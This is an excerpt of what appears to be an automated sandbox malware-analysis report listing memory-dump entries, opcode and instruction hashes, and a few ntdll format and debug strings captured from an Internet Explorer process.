                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                                                                                                                                              • Instruction ID: 2b9249b79c5270e668d31b203b0dcb88f8cb9e8022bd070b989544eced49e117
                                                                                                                                                                              • Opcode Fuzzy Hash: f0e4b363008d233613640516718de908853f606166341a9db1ad154f1ac005a1
                                                                                                                                                                              • Instruction Fuzzy Hash: 4390023521545C42D140B1584404A46002587D0305F55C011A1064694D97258E95B661
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                                                                                                                                              • Instruction ID: 2002594270649ea60cba57fe24682524861bc9e5304bce96fda60fe5e850ce38
                                                                                                                                                                              • Opcode Fuzzy Hash: e60c5edd05327f9a741c99cf4219836660d2b07b25739b11b8597d258ec96fe0
                                                                                                                                                                              • Instruction Fuzzy Hash: 3990023521141C02D180B158440464A001587D1301F95C015A1025654DCB158B9977A1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: fc06a42f6f6432d77ab4bc52864f67706a7e45a7709aa7204d9de0cc74a8c43f
                                                                                                                                                                              • Instruction ID: a3e9abb57e2af43b1371449f2f23eabb0516d9ef3f6ee7939fa6bf0280c5da26
                                                                                                                                                                              • Opcode Fuzzy Hash: fc06a42f6f6432d77ab4bc52864f67706a7e45a7709aa7204d9de0cc74a8c43f
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E9002A5211554924500F2588404B0A451587E0201B55C016E2054560CC62589919135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                                                                                                                                              • Instruction ID: 4aa041df233e0283477c31b896e3148914c89d9dedc8a0f5884b536371326aab
                                                                                                                                                                              • Opcode Fuzzy Hash: 483d8d08dcc884aa7b2ea9de5487902550d219ad07acaa650dab5256e907d952
                                                                                                                                                                              • Instruction Fuzzy Hash: FE900229231414020145F558060450B045597D6351395C015F2416590CC72189A55321
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                                                                                                                                              • Instruction ID: ab87efea4485dfc199705ccf851009ffafc09bca01f757f34846777fc1abf054
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ae2e85e0c042f0054418d7e58552798f45228401970487a8a2632da805a24e8
                                                                                                                                                                              • Instruction Fuzzy Hash: E890043D331414030105F55C07045070057C7D5351355C031F3015550CD731CDF15131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                                                                                                                                              • Instruction ID: 16c2c80118fbf208e03a801c5707bc193d1c122dbd2bf868395471aad8c36b83
                                                                                                                                                                              • Opcode Fuzzy Hash: 4175aa7ea41ad7c634b23457375d8fb4253b7f049e70a82788b3a421a64a750a
                                                                                                                                                                              • Instruction Fuzzy Hash: 5690022525546502D150B15C44046164015A7E0201F55C021A1814594D865589956221
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                                                                                                                                              • Instruction ID: 3f0b657a2463e81921aee61bcd4cb68efe001bf08b02c3d6dfcb387c4736c0b0
                                                                                                                                                                              • Opcode Fuzzy Hash: 4946484c548444c2a80a6b5cf29b078f353b3ca69d1e03384783d21c25f49530
                                                                                                                                                                              • Instruction Fuzzy Hash: CF90026535141842D100B1584414B060015C7E1301F55C015E2064554D8719CD926126
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0f8bd522b5bd2a69eaf154ab3bcdcb0130b83fc2da03e2ab55ac6ed13a93dabf
                                                                                                                                                                              • Instruction ID: 137c0d3c1a8f56bbd49d7957fc8b4b80c1790433f5e91cce57ebd4ccda559034
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8bd522b5bd2a69eaf154ab3bcdcb0130b83fc2da03e2ab55ac6ed13a93dabf
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C90047533141443D104F15C44047070055C7F1301F55C013F3154554CC73DCDF15135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b6314ddd15f0cba431f72c0cec689e3b6cb35d572a614d621ac2ffa5b43d7396
                                                                                                                                                                              • Instruction ID: cfc48eae67ecb50effa204cf7fd57dfaa701b463042fb1108e4cbd7d49780eae
                                                                                                                                                                              • Opcode Fuzzy Hash: b6314ddd15f0cba431f72c0cec689e3b6cb35d572a614d621ac2ffa5b43d7396
                                                                                                                                                                              • Instruction Fuzzy Hash: F990023521181802D100B1584808747001587D0302F55C011A6164555E8765C9D16531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                                                                                                                                              • Instruction ID: 0499f5329f231d21c61179efc6bdbf3d2676c99cdc994fb43219c1329666a8bc
                                                                                                                                                                              • Opcode Fuzzy Hash: 9936fe9ee8bc01859120f992c235dd66cc8618cd5eace7fd6f05dbac901347a9
                                                                                                                                                                              • Instruction Fuzzy Hash: 07900225611414424140B16888449064015ABE1211755C121A1998550D865989A55665
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c6dcbb855101954db33d692e71260753738db5e29d43a20cdef66b18f979cff2
                                                                                                                                                                              • Instruction ID: bcd499e33ff038c2dfdd630fb72bda4549c0ae328f42702ad934be91e10267ba
                                                                                                                                                                              • Opcode Fuzzy Hash: c6dcbb855101954db33d692e71260753738db5e29d43a20cdef66b18f979cff2
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E90023521181802D100B158481470B001587D0302F55C011A2164555D872589916571
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                                                                                                                                              • Instruction ID: a690e302b6ca4ffc36c28902edbe7d04e3703708f480cc5e460d567d9910e443
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e5cc4d053382a120532333e0114cb14f2ae5c98e850d9b8abc344097028946e
                                                                                                                                                                              • Instruction Fuzzy Hash: F3900225221C1442D200B5684C14B07001587D0303F55C115A1154554CCA1589A15521
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 21dc18fb68077f0f5ec916551e5151c438921cd8617ace2411f3a7ee9d9a71dc
                                                                                                                                                                              • Instruction ID: 5d8f649d29bcc62f1c426629806671189f326a83e8e7e2f7ec56ccac23b4e61a
                                                                                                                                                                              • Opcode Fuzzy Hash: 21dc18fb68077f0f5ec916551e5151c438921cd8617ace2411f3a7ee9d9a71dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 7D90022531141802D102B15844146060019C7D1345F95C012E2424555D87258A93A132
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6301115c12e5e3a87e1bde74b88c4712729c5cb75be1835a2713422e97c02d80
                                                                                                                                                                              • Instruction ID: f9f0a797c6c9dd649fc9c554d26f141fc62dbdfe2003d40c74806d0e75de0838
                                                                                                                                                                              • Opcode Fuzzy Hash: 6301115c12e5e3a87e1bde74b88c4712729c5cb75be1835a2713422e97c02d80
                                                                                                                                                                              • Instruction Fuzzy Hash: 4C90027521141802D140B1584404746001587D0301F55C011A6064554E87598ED56665
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                                                                                                                                              • Instruction ID: 64397727308088e09c81ad56c401e05d773adfd3a9ee482a1eb47ced0d3d8982
                                                                                                                                                                              • Opcode Fuzzy Hash: a306f25142da3369fb5c0aace62c10c936ef7abb441a2ca61b6ab9c83197dfd7
                                                                                                                                                                              • Instruction Fuzzy Hash: BE90022561141902D101B1584404616001A87D0241F95C022A2024555ECB258AD2A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                                                                                                                                              • Instruction ID: f7269772387fa3bd0531b57ecbad56f36624e1c1dc49091b913b0a74093dc665
                                                                                                                                                                              • Opcode Fuzzy Hash: 52f14384ef778a3809ff7cc8864951672cf26401c3f4ff439a72fa05e41e1f02
                                                                                                                                                                              • Instruction Fuzzy Hash: 1390026521181803D140B5584804607001587D0302F55C011A3064555E8B298D916135
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                                                                                                                                              • Instruction ID: 2f1675733d133693df72ab1d2d4c045e017f21d82db2819293bfc6aa5f1b4a12
                                                                                                                                                                              • Opcode Fuzzy Hash: 29a97bf626962d85cf2ab9c567a3713e01aec514fee6e5b6211e824b218f7ecf
                                                                                                                                                                              • Instruction Fuzzy Hash: AC90043531141403D140F15C541C7074015D7F1301F55D011F1414554CDF15CDD75333
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 604f3a98d0364ce809a360545588ddab50445ada7298b3ad7a0148039443d676
                                                                                                                                                                              • Instruction ID: 45ffb5c80df7f5a99848033b39c03eecac67835a6c075c457e17f392802ada9f
                                                                                                                                                                              • Opcode Fuzzy Hash: 604f3a98d0364ce809a360545588ddab50445ada7298b3ad7a0148039443d676
                                                                                                                                                                              • Instruction Fuzzy Hash: B490022521545842D100B5585408A06001587D0205F55D011A2064595DC7358991A131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2aab016d322483a4864951f0369ee8298aa9caec72384766c367dcd5c9444431
                                                                                                                                                                              • Instruction ID: 48aa507eddd71f604cd01638da484684e3236d5a4eee04b9e4ad21e9854ad3f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 2aab016d322483a4864951f0369ee8298aa9caec72384766c367dcd5c9444431
                                                                                                                                                                              • Instruction Fuzzy Hash: BC900235212415429540B2585804A4E411587E1302B95D415A1015554CCA1489A15221
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                                                                                                                                              • Instruction ID: db049098ca062a2bcea82e95d885c584bb1f4a45220b9e44f18c0651546df5d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 2fcf2705a8b209810c2256d502c3c58f0fdbee92512a8c80805e9b433218a915
                                                                                                                                                                              • Instruction Fuzzy Hash: DA90022D22341402D180B158540860A001587D1202F95D415A1015558CCA1589A95321
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5f626cec17d05a1953ac04764b422ec92a3072636edfe5e8ddaca3feb7be65c6
                                                                                                                                                                              • Instruction ID: 9982c5acf852d5c07de393dbfaa96889442d15cf519ac4d535d3689a252e55e5
                                                                                                                                                                              • Opcode Fuzzy Hash: 5f626cec17d05a1953ac04764b422ec92a3072636edfe5e8ddaca3feb7be65c6
                                                                                                                                                                              • Instruction Fuzzy Hash: 0490023921141802D510B1585804646005687D0301F55D411A1424558D875489E1A121
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 24d6f8d514728a6ef358676e632f88e16342afabc9efdb67ac9cf227d7aaeed1
                                                                                                                                                                              • Instruction ID: 8ed4c37aa4b4259029f8035236887a34af04aa091b936c722c40532d3e519c26
                                                                                                                                                                              • Opcode Fuzzy Hash: 24d6f8d514728a6ef358676e632f88e16342afabc9efdb67ac9cf227d7aaeed1
                                                                                                                                                                              • Instruction Fuzzy Hash: 2B90023525141802D141B1584404606001997D0241F95C012A1424554E87558B96AA61
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                                                                                                                                              • Instruction ID: 9dd91abac64a5027d659b903bd2392aa628466fcbd3e1a7a6c3d8d1a8bab5cb9
                                                                                                                                                                              • Opcode Fuzzy Hash: 1ad3abc69163c0611161d2d0fa9abf5097f50557bd233ee98351e5802ff1f4b1
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B900225252455525545F1584404507401697E0241795C012A2414950C86269996D621
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
                                                                                                                                                                              • Instruction ID: 799bd37726d86a0eceb6ff8e192d6455ddbee90f33ca842fdce9364804858ac2
                                                                                                                                                                              • Opcode Fuzzy Hash: 630a7d9e2b64581dfb262c2dfa5b3e2132f28835bac02b1392b75a2e8a339769
                                                                                                                                                                              • Instruction Fuzzy Hash: 9590043531141C43D100F15C4404F470015C7F0301F55C017F1134754DC715CDD17531
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                                                                                                                                              • Instruction ID: 77d4324e3d78e70afdff5ab4b4a16398eb4a6b8452091ebd3538affc08b3e2cf
                                                                                                                                                                              • Opcode Fuzzy Hash: bd1d037e5aeae7a90df1b0f41cd19eb3dcb8a32c70c5cf1ea79f2121ff588bea
                                                                                                                                                                              • Instruction Fuzzy Hash: C490023521141802D100B5985408646001587E0301F55D011A6024555EC76589D16131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 42f81cee2909a3b9095fafc1bb87706fb2b6545fede84f0bc06d90b9f6f05b39
                                                                                                                                                                              • Instruction ID: e0f2f7cebd79e833ab7858ca908d322da572a76c44a8244b89ee50298e9ad2c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 42f81cee2909a3b9095fafc1bb87706fb2b6545fede84f0bc06d90b9f6f05b39
                                                                                                                                                                              • Instruction Fuzzy Hash: 1C90043531141C03D100F15C550C7070015C7D0301F55D411F143455CDD757CDD17131
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: d3a72a9fdad4d229403bf77470df8394a8a2dc6518872d576394917e943082e8
                                                                                                                                                                              • Instruction ID: 01ac59a627555326ef312c407633e3a63585f84d3274aef250ebe185c1f69016
                                                                                                                                                                              • Opcode Fuzzy Hash: d3a72a9fdad4d229403bf77470df8394a8a2dc6518872d576394917e943082e8
                                                                                                                                                                              • Instruction Fuzzy Hash: B390022561541802D140B1585418706002587D0201F55D011A1024554DC7598B9566A1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction ID: ad70226235aafe987def9f8345467c6dc3b32da19c6482b58e4376f9d79443ad
                                                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                              • Opcode ID: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                                                                                                                                              • Instruction ID: 5dd81b47c92b7d01faec2a3bc89d8580878746c7aad80b91430ac9947cdf1fc4
                                                                                                                                                                              • Opcode Fuzzy Hash: 878b8b497aae63c76d819fea03c36172c316ec815c054703d376c80f2051fb0f
                                                                                                                                                                              • Instruction Fuzzy Hash: B551A7B6A30256BFCF10DB98989097EF7B8BB08201B14C76DE569D7641D674DE808BE0
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 032F4787
                                                                                                                                                                              • Execute=1, xrefs: 032F4713
                                                                                                                                                                              • ExecuteOptions, xrefs: 032F46A0
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 032F4742
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 032F4655
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032F46FC
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 032F4725
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000005.00000002.2333103481.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_5_2_3250000_iexplore.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
